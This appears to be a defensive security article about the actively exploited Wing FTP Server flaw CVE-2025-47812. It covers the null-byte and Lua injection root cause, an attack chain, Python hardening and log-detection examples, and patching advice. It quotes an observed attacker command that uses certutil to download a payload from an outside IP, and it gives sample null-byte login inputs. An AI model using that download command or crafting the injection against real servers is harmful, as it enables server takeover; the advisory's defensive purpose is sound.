Critical Wing FTP Server Vulnerability (CVE‑2025‑47812) Actively Being Exploited in the Wild
In mid‑2025, security researchers sounded an urgent alarm about a critical remote code execution (RCE) vulnerability in Wing FTP Server — tracked as CVE‑2025‑47812 — that is already being actively exploited by malicious actors in real‑world attacks. With a maximum severity score and the ability to allow unauthenticated, root‑level command execution, this flaw represents one of the most dangerous vulnerabilities discovered so far in 2025 and demands immediate action from organizations still running affected versions. NVD
What Is Wing FTP Server and Why It Matters
Wing FTP Server is a versatile file transfer server widely used across industries to provide secure file sharing capabilities over FTP, FTPS, SFTP, and HTTP/S protocols. Its flexibility and cross‑platform support (Windows, Linux, macOS) make it popular in corporate environments, critical infrastructure, data centers, and even government agencies. SOCRadar® Cyber Intelligence Inc.
Because FTP and related services are often used to move sensitive files — including backups, invoices, proprietary data, and administrative scripts — any flaw that allows attackers to compromise such a server can have severe business, operational, and regulatory consequences. Fidelis Security
What Makes CVE‑2025‑47812 So Dangerous
Technical Root Cause: Null‑Byte and Lua Injection
The vulnerability stems from improper handling of null (\0) bytes in the authentication logic of Wing FTP Server’s web interface, specifically within endpoints such as /loginok.html. This flaw allows attackers to craft malicious requests that include null bytes in the username parameter, misleading the server’s string‑handling code. Once a null byte prematurely terminates a string, it opens the door for Lua code injection into user session files. NVD
Lua scripting is embedded within Wing FTP’s session processing logic. When unauthorized Lua code is injected into files that the server later reads and executes as part of normal operation, the injected code runs with the same high privileges as the Wing FTP Server process itself — which is typically root on Linux systems or SYSTEM on Windows machines. NVD
This combination of null‑byte injection and script execution creates an RCE pathway with no authentication required, enabling:
- Command execution on compromised hosts
- Deployment of malware
- Creation of persistent backdoor accounts
- Full server takeover and lateral movement into networks The Hacker News
The flaw is so serious that its CVSS v3.1 score is a critical 10.0, reflecting maximum impact to confidentiality, integrity, and availability. OpenCVE
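To make the root-cause class concrete, here is an added Python model (not Wing FTP Server's own code; the allow-list of usernames and the session-file layout are assumptions for illustration) that contrasts a C-style check stopping at the first NUL byte with a session writer that emits the whole string into Lua source, and then shows the hardened pattern: validate the complete value and serialize it only as a quoted literal.

```python
"""Simplified model of a NUL-truncation / code-injection mismatch.

Added example, not Wing FTP Server's actual implementation. ALLOWED_USERS and
the 'username = "..."' session-file line are assumed for illustration only.
"""
import re

ALLOWED_USERS = {"anonymous", "alice"}   # assumed allow-list


def visible_to_c(s: str) -> str:
    """What strlen()/strcmp()-style code sees: everything after the first NUL vanishes."""
    return s.split("\x00", 1)[0]


def login_check_vulnerable(username: str) -> bool:
    # Only the truncated view is compared, so "anonymous\x00<anything>" passes as "anonymous".
    return visible_to_c(username) in ALLOWED_USERS


def session_file_vulnerable(username: str) -> str:
    # Length-aware string handling later writes the *full* value, NUL and all, into Lua source.
    return f'username = "{username}"\n'


# ---- hardened variant -------------------------------------------------------
_SAFE_USERNAME = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def login_check_hardened(username: str) -> bool:
    # Validate the complete value before any comparison; a NUL or other control
    # character fails the allow-list pattern, so truncated and full views cannot disagree.
    return bool(_SAFE_USERNAME.fullmatch(username)) and username in ALLOWED_USERS


def lua_quote(s: str) -> str:
    """Serialize in the style of Lua's string.format('%q'): escape quotes,
    backslashes and every control byte as \\ddd, so the value stays a string literal."""
    out = []
    for ch in s:
        if ch in '"\\':
            out.append("\\" + ch)
        elif ord(ch) < 32 or ord(ch) == 127:
            out.append("\\%03d" % ord(ch))
        else:
            out.append(ch)
    return '"' + "".join(out) + '"'


def session_file_hardened(username: str) -> str:
    if not login_check_hardened(username):
        raise ValueError("username rejected")
    return f"username = {lua_quote(username)}\n"
```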
Active Exploitation: Attacks Started Fast
Once details of the flaw were publicly disclosed on June 30, 2025, attackers wasted little time. Researchers from Huntress observed actual exploitation attempts as early as July 1, 2025 — just one day later. These early attacks demonstrated how swiftly threat actors can weaponize publicly released vulnerability details and proof‑of‑concept code against exposed servers. Huntress
In the observed incident, attackers:
- Connected to the vulnerable Wing FTP Server process (WFTPServer.exe)
- Attempted reconnaissance on the victim host
- Created new user accounts for persistence
- Tried to download and run malicious binaries using certutil, a legitimate Windows tool commonly abused by attackers to download files from the internet (e.g., certutil -urlcache -f http://185.196.9[.]225:8080/... %TEMP%\<file.exe>). Huntress
Thanks to proactive endpoint protection (Microsoft Defender), the downloaded payload was blocked before execution, and the attack terminated when the server process crashed. Nonetheless, this early real‑world exploitation confirmed that threat actors were already targeting vulnerable installations soon after disclosure. Huntress
How Many Servers Are at Risk?
According to internet scanning and threat intelligence data, there were approximately 8,100 publicly accessible devices running Wing FTP Server, of which around 5,000 had their web management interfaces exposed to the Internet — the exact endpoint that the vulnerability targets. Censys
These exposed interfaces are prime targets for exploit traffic because they accept HTTP/S requests that can be manipulated to carry the malicious null‑byte payloads necessary for the exploit. Censys
The geographic distribution of vulnerable servers spanned multiple regions, including the United States, China, Germany, the United Kingdom, and India — underscoring that this is not a localized issue but a global threat. The Hacker News
Why the Vulnerability Is So Easy to Attack
Several factors contributed to both the severity and the rapid exploitation of CVE‑2025‑47812:
1. No Authentication Required
Because the bug can be triggered without any credential requirement — even through anonymous FTP access in some configurations — attackers don’t need to first compromise user accounts or guess passwords. NVD
2. Publicly Available Exploit Code
Proof‑of‑concept exploits were released online shortly after publication, meaning attackers can easily adapt them to target vulnerable hosts. Open exploit code significantly lowers the barrier for exploitation by novice and intermediate attackers. Canadian Centre for Cyber Security
3. Deep Privilege Execution
Once exploited, the attacker essentially gains the same rights as the server process — often full administrative control — giving them the ability to run any system‑level commands, deploy shells, or install persistent malware. OpenCVE
4. High Exposure Count
Thousands of internet‑facing servers were still running older software versions because administrators had not applied the vendor patch, creating a large pool of easy targets for attackers to probe and compromise. Censys
Vendor and Government Responses
Wing FTP Server’s vendor released a security update — version 7.4.4 on May 14, 2025 — that fixes CVE‑2025‑47812 and related flaws. Administrators are urged to upgrade immediately to this or later versions to mitigate the risk. Canadian Centre for Cyber Security
The vulnerability was also added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) Catalog, meaning federal and critical infrastructure entities are required to address it under applicable directives by early August 2025. CVEFeed
Government cyber centers, including Canada’s Cyber Centre and NHS England’s National CSOC, have issued alerts confirming active exploitation and calling for urgent remediation among their constituencies. Canadian Centre for Cyber Security
Example Attack Chain (Simplified)
To understand how the vulnerability works in practice:
- Initial Probe: An attacker scans for Wing FTP Server web interfaces exposed on the internet.
- Payload Delivery: The attacker sends a crafted HTTP POST request to the vulnerable /loginok.html endpoint containing a null byte (%00) and Lua injection code.
- Session File Corruption: The server mishandles the null byte, causing the injected Lua to be written into session files.
- Execution Trigger: When the server reads those session files — as part of its normal session handling — the malicious Lua runs.
- Command Execution: The injected script executes arbitrary system commands with root/SYSTEM privileges.
- Post‑Exploit Activity: Once a foothold is achieved, attackers may create accounts, deploy backdoors, or stage further malware. Censys
Real‑World Impacts of Exploitation
Even in the early observed exploitation, attackers attempted:
- Enumeration and reconnaissance of the compromised host.
- Creation of new user accounts to sustain persistence.
- Deployment of Remote Monitoring and Management (RMM) tools (like ScreenConnect). Help Net Security
While defenders intercepted these actions in the observed case, the potential consequences on unprotected systems are far more severe:
- Full server compromise with root/system privileges.
- Data theft from sensitive file exchanges.
- Deployment of ransomware or other malware.
- Lateral movement into internal networks. Help Net Security
Urgent Mitigation and Best Practices
Given the severity and active exploitation, organizations should take these steps immediately:
1. Patch Immediately
Upgrade all Wing FTP Server installations to version 7.4.4 or later. This fixes the vulnerability and should be prioritized for known or suspected internet‑facing instances. Canadian Centre for Cyber Security
2. Restrict Administrative Interfaces
If patching cannot be done immediately, restrict access to the web admin interface using firewalls, VPNs, or access control lists to block public access. Kodem Security
3. Disable Anonymous FTP Logins
While not a complete mitigation, disabling anonymous access reduces the attack surface, since the flaw is exploitable via those accounts in some configurations. Kodem Security
4. Monitor Logs for Suspicious Activity
Check logs for signs of malformed username parameters, unusual session file modifications, or unexpected Lua files, which can be indicators of exploitation attempts. Kodem Security
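One way to implement the check for malformed username parameters, as an added example rather than anything from Kodem or the Wing FTP project: it assumes you can obtain raw login requests (for instance from a reverse proxy or WAF that records POST bodies) as method/target/body tuples, and the sample traffic below is constructed.

```python
"""Flag Wing FTP web-login requests whose form parameters carry a null byte.

Added example; hypothetical detection code, not Huntress', Kodem's or Wing FTP's.
Input is assumed to be (method, target, body) tuples from a proxy/WAF request log.
"""
from urllib.parse import parse_qs, urlsplit

# Endpoint named in the advisory; extend if your deployment exposes others.
LOGIN_ENDPOINTS = {"/loginok.html"}


def null_byte_findings(method: str, target: str, body: str) -> list[str]:
    """Return human-readable findings for one request (empty list = nothing odd)."""
    parts = urlsplit(target)
    if parts.path not in LOGIN_ENDPOINTS:
        return []
    findings = []
    for where, raw in (("query", parts.query), ("body", body)):
        # parse_qs percent-decodes once, so an encoded %00 becomes a real NUL character
        for name, values in parse_qs(raw, keep_blank_values=True).items():
            for value in values:
                if "\x00" in value:
                    findings.append(f"{method} {parts.path}: {where} parameter {name!r} contains a null byte")
                elif "%00" in value.lower():
                    # %2500 decodes to a literal "%00": double encoding aimed at a second decoder
                    findings.append(f"{method} {parts.path}: {where} parameter {name!r} still holds an encoded null byte after one decode")
    return findings


# Constructed sample traffic (not real captures): one benign login, three suspicious, one unrelated.
SAMPLE_REQUESTS = [
    ("POST", "/loginok.html", "username=alice&password=s3cret"),
    ("POST", "/loginok.html", "username=anonymous%00trailing&password=x"),
    ("POST", "/loginok.html?username=guest%00x", ""),
    ("POST", "/loginok.html", "username=guest%2500x&password=x"),
    ("GET", "/index.html", ""),
]


def triage(requests=SAMPLE_REQUESTS) -> dict[int, list[str]]:
    """Map request index -> findings for every request that tripped a check."""
    return {i: f for i, r in enumerate(requests) if (f := null_byte_findings(*r))}


if __name__ == "__main__":
    for idx, findings in triage().items():
        print(f"request #{idx}:", *findings, sep="\n  ")
```

Pair the request check with file-integrity monitoring on the session directory so that unexpected modifications to session (Lua) files are alerted on as well.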
5. Rotate Credentials
After patching, reset credentials tied to affected servers to prevent unauthorized access using compromised backdoor accounts. Kodem Security
6. Comprehensive Inventory
Organizations should audit their software inventory and software bill of materials (SBOMs) to identify all instances of Wing FTP Server before 7.4.4 and prioritize updates. Kodem Security
Conclusion: A Critical Risk with Active Threats
CVE‑2025‑47812 — a critical null‑byte and Lua injection flaw in Wing FTP Server — represents a catastrophic risk to unpatched systems, enabling unauthenticated attackers to execute arbitrary code at the highest possible privilege level. The fact that exploitation began within 24 hours of public disclosure underscores how quickly attackers move to weaponize vulnerabilities, especially when proof‑of‑concept code is available. Huntress
With thousands of exposed servers worldwide, organizations using Wing FTP Server must act immediately to patch, restrict access, and monitor systems to prevent severe compromises that could lead to data loss, ransomware deployment, or broader network breaches. The global threat landscape continues to evolve rapidly, and this vulnerability is a stark reminder that zero‑day or newly disclosed critical bugs can — and will — be exploited in the wild rapidly and at scale. Censys